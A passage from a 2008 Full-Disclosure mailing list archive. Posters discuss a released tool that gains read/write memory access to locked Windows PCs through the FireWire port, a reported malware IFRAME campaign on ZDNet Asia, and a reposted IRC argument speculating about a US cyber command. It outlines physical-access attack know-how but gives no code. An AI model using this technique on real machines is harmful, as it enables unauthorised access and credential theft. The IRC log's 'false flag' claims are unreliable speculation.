password needed In-Reply-To: <6450e99d0803041357h625c9627m96568e09fbedee20@mail.gmail.com> References: <6450e99d0803041357h625c9627m96568e09fbedee20@mail.gmail.com> Message-ID: <16cd6eab0803041533g35c228a3l1c8cdd3e106e1d26@mail.gmail.com> 2008/3/4, Ivan . : > http://www.smh.com.au/news/security/hack-into-a-windows-pc--no-password-needed/2008/03/04/1204402423638.html > Here is a (totally unofficial) mirror of Metlstorm's files in case you can't reach his overloaded website :-\ http://www.hotsecuritynews.com/fearwire/ Again, very nice work Metlstorm ! From steven at securityzone.org Tue Mar 4 23:41:39 2008 From: steven at securityzone.org (Steven Adair) Date: Tue, 4 Mar 2008 18:41:39 -0500 (EST) Subject: [Full-disclosure] Hack into a Windows PC - no password needed In-Reply-To: <6450e99d0803041357h625c9627m96568e09fbedee20@mail.gmail.com> References: <6450e99d0803041357h625c9627m96568e09fbedee20@mail.gmail.com> Message-ID: <4160.65.88.218.157.1204674099.squirrel@slashmail.org> I guess the release of this tool makes physical access pen-tests a little bit easier huh? Will have to try this out some time. Steven > http://www.smh.com.au/news/security/hack-into-a-windows-pc--no-password-needed/2008/03/04/1204402423638.html > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > From dancho.danchev at gmail.com Tue Mar 4 15:52:58 2008 From: dancho.danchev at gmail.com (Dancho Danchev) Date: Tue, 4 Mar 2008 07:52:58 -0800 Subject: [Full-disclosure] ZDNet Asia and TorrentReactor IFRAME-ed Message-ID: An in-depth overview of a currently active malware IFRAME campaign, that's targeting ZDNet Asia and TorrentReactor's search engine optimization practices of generating, and locally caching the search queries pages, thereby positioning the now cached popular keywords with the IFRAME between the first ten to twenty search results, taking advantage of the sites' high page ranks. The current state of the exploitation technique used, allows the malicious parties to basically inject as many, and as diverse keywords, presumebly taking advantage of today's world events. Sample redirects, lead me to known Russian Business Network netblocks and ex-customers in the face of rogue anti-virus and any-spyware applications, as well as fake codecs. http://ddanchev.blogspot.com/2008/03/zdnet-asia-and-torrentreactor-iframe-ed.html Regards -- Dancho Danchev Cyber Threats Analyst/Blogger http://ddanchev.blogspot.com http://windowsecurity.com/Dancho_Danchev From Larry at larryseltzer.com Wed Mar 5 00:00:33 2008 From: Larry at larryseltzer.com (Larry Seltzer) Date: Tue, 4 Mar 2008 19:00:33 -0500 Subject: [Full-disclosure] Hack into a Windows PC - no password needed In-Reply-To: <16cd6eab0803041533g35c228a3l1c8cdd3e106e1d26@mail.gmail.com> References: <6450e99d0803041357h625c9627m96568e09fbedee20@mail.gmail.com> <16cd6eab0803041533g35c228a3l1c8cdd3e106e1d26@mail.gmail.com> Message-ID: <0273B67044957C41BD71D12EBA2E00AE252ECB@becca.LarrySeltzer.local> The key to the vulnerability: "To use the tool, hackers must connect a Linux-based computer to a Firewire port on the target machine. The machine is then tricked into allowing the attacking computer to have read and write access to its memory. " I assume this makes it a local login, not a domain login. "Paul Ducklin, head of technology for security firm Sophos, said the security hole found by Boileau was not a vulnerability or bug in the traditional sense, because the ability to use the Firewire port to access a computer's memory was actually a feature of Firewire." So does the same capability exist on Macs? Larry Seltzer eWEEK.com Security Center Editor http://security.eweek.com/ http://blogs.pcmag.com/securitywatch/ Contributing Editor, PC Magazine larry.seltzer at ziffdavisenterprise.com From worriedsecurity at googlemail.com Wed Mar 5 02:13:00 2008 From: worriedsecurity at googlemail.com (worried security) Date: Wed, 5 Mar 2008 02:13:00 +0000 Subject: [Full-disclosure] us cyber command In-Reply-To: <67ea64530803030631q251a404biaa3f3007f2098757@mail.gmail.com> References: <67ea64530803030631q251a404biaa3f3007f2098757@mail.gmail.com> Message-ID: <67ea64530803041813sc0f1027vfc6cbcd9ad588c22@mail.gmail.com> On Mon, Mar 3, 2008 at 2:31 PM, worried security wrote: > [02:40] do you think cyber terrorism is real or its just the > government softening ppl up for a couple of false flags for a reason > to bomb iran? > [02:49] the u.s are still deciding where to build the cyber > command, so don't expect any die hard style false flags till 2009 > [02:50] they said their false flag cyber command would be up > and running by december 2008 > [02:50] so they will test out their capabilities probably 2009/10 > Mar 03 22:50:50 bunch of skript kiddos with DDoS nets... this is why ppl will stop posting vulnerabilities to mailing lists, so the enemy can't use it against their countries Mar 03 22:51:10 huh? Mar 03 22:53:22 for instance do you think UK/china/iran hackers are going to keep posting to mailing lists vulnerabilties jsut so the script kids at the US cyber command can copy and paste the code to black out our electricity grids etc? Mar 03 22:53:25 http://www.ktbs.com/news/Ad-promote-Cyber-command-9337/ Mar 03 22:54:00 we will stop feeding the mailing lists the "cyber ammo" so the us cyber command can't attack our countries Mar 03 22:55:25 the us cyber command are advertising a cyber war on news articles, but do they realise what will happen if their is a cyber war? no will will post to the mailing lists anymore. Mar 03 22:55:55 the us government are the biggest dumb asses who dont think things through Mar 03 22:56:24 it will stop new techniques getting publically disclosed etc Mar 03 22:56:44 because nonUS hackers dont want to give the US gov ideas on how to hack non US countries Mar 03 22:57:07 we're already in a cyber war. Mar 03 22:57:23 so i hope the fucking us gov cyber command have good security researchers to find their own vulns and techniques Mar 03 22:57:49 cos their enemies wont post on the mailign lsits if cities start getting blacked out by US gov Mar 03 22:59:07 they do. Mar 03 22:59:18 oh have they hired hd moore? Mar 03 23:00:13 trust me the us gov rely on whats post to the mailing lsits as much as everyone else Mar 03 23:00:31 we are in a cyber war? sheeeesh last night we were in a trojan war Mar 03 23:00:35 and if they start attacking other nations when the cyber command is built Mar 03 23:00:49 then non-us hackers will stop posting to mailing lsits Mar 03 23:01:06 then the whole security community will fuck up Mar 03 23:01:23 the cyber command is nothing new. Mar 03 23:01:31 it is Mar 03 23:01:34 It is just a structural reorganization. Mar 03 23:01:41 its more than that Mar 03 23:01:55 this is about attacking nations Mar 03 23:01:59 you actually think that everything they are advertising isn't going on already? Mar 03 23:02:31 not on a big a scale as their planning Mar 03 23:02:53 60,000+ cyber command staff in a purpose built cyber battle center Mar 03 23:03:53 these dorks will bring the end to the security community as we know it the dumb asses Mar 03 23:04:17 nothing will get publically disclosed if real cyber war breaks out Mar 03 23:06:06 it's not going to be as big as you think. Mar 03 23:06:24 It's going to put a lot of existing jobs and stations under a central command. Mar 03 23:07:20 a strategic command? Mar 03 23:07:57 yes.. US Strategic Command will be in the mix somewhere. Mar 03 23:15:50 how many real hackers out of the hundreds of script kids will they hire Mar 03 23:16:13 there aint that many "elite" hackers out there Mar 03 23:16:28 that's where defense contractors come in. Mar 03 23:20:24 what do you mean Mar 03 23:23:00 a lot of talent consults for the government. Mar 03 23:23:30 a chinese defence contractor is going to give hackers to us so the us can black out chinese infrastructure when us get angry with china? Mar 03 23:24:11 there are plenty of chinese foreign nationals working for the US government. Mar 03 23:29:36 I'm off to bed. Goodnight. From eric at rachner.us Wed Mar 5 02:13:10 2008 From: eric at rachner.us (Eric Rachner) Date: Tue, 4 Mar 2008 18:13:10 -0800 Subject: [Full-disclosure] Hack into a Windows PC - no password needed In-Reply-To: <0273B67044957C41BD71D12EBA2E00AE252ECB@becca.LarrySeltzer.local> References: <6450e99d0803041357h625c9627m96568e09fbedee20@mail.gmail.com> <16cd6eab0803041533g35c228a3l1c8cdd3e106e1d26@mail.gmail.com> <0273B67044957C41BD71D12EBA2E00AE252ECB@becca.LarrySeltzer.local> Message-ID: <003301c87e66$77981a40$66c84ec0$@us> Actually, it's full system compromise -- if the machine is joined to a domain, then any domain account credentials known to that machine are compromised as well. And yes, the same capability exists not only on Macs but on any computer that implements the Firewire specification. (details at http://storm.net.nz/projects/16) - Eric -----Original Message----- From: full-disclosure-bounces at lists.grok.org.uk [mailto:full-disclosure-bounces at lists.grok.org.uk] On Behalf Of Larry Seltzer Sent: Tuesday, March 04, 2008 4:01 PM To: Untitled Subject: Re: [Full-disclosure] Hack into a Windows PC - no password needed The key to the vulnerability: "To use the tool, hackers must connect a Linux-based computer to a Firewire port on the target machine. The machine is then tricked into allowing the attacking computer to have read and write access to its memory. " I assume this makes it a local login, not a domain login. "Paul Ducklin, head of technology for security firm Sophos, said the security hole found by Boileau was not a vulnerability or bug in the traditional sense, because the ability to use the Firewire port to access a computer's memory was actually a feature of Firewire." So does the same capability exist on Macs? Larry Seltzer eWEEK.com Security Center Editor http://security.eweek.com/ http://blogs.pcmag.com/securitywatch/ Contributing Editor, PC Magazine larry.seltzer at ziffdavisenterprise.com _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -------------- next part -------------- A non-text attachment was scrubbed... Name: winmail.dat Type: application/ms-tnef Size: 2950 bytes Desc: not available Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20080304/311d35ac/attachment.bin From eric at rachner.us Wed Mar 5 02:15:13 2008 From: eric at rachner.us (Eric Rachner) Date: Tue, 4 Mar 2008 18:15:13 -0800 Subject: [Full-disclosure] Hack into a Windows PC - no password needed In-Reply-To: <0273B67044957C41BD71D12EBA2E00AE252ECB@becca.LarrySeltzer.local> References: <6450e99d0803041357h625c9627m96568e09fbedee20@mail.gmail.com> <16cd6eab0803041533g35c228a3l1c8cdd3e106e1d26@mail.gmail.com> <0273B67044957C41BD71D12EBA2E00AE252ECB@becca.LarrySeltzer.local> Message-ID: <003701c87e66$c0e13dd0$42a3b970$@us> Actually, it's full system compromise -- if the machine is joined to a domain, then any domain account credentials known to that machine are compromised as well. And yes, the same capability exists not only on Macs but on any computer that implements the Firewire specification. (details at http://storm.net.nz/projects/16) - Eric -----Original Message----- From: full-disclosure-bounces at lists.grok.org.uk [mailto:full-disclosure-bounces at lists.grok.org.uk] On Behalf Of Larry Seltzer Sent: Tuesday, March 04, 2008 4:01 PM To: Untitled Subject: Re: [Full-disclosure] Hack into a Windows PC - no password needed The key to the vulnerability: "To use the tool, hackers must connect a Linux-based computer to a Firewire port on the target machine. The machine is then tricked into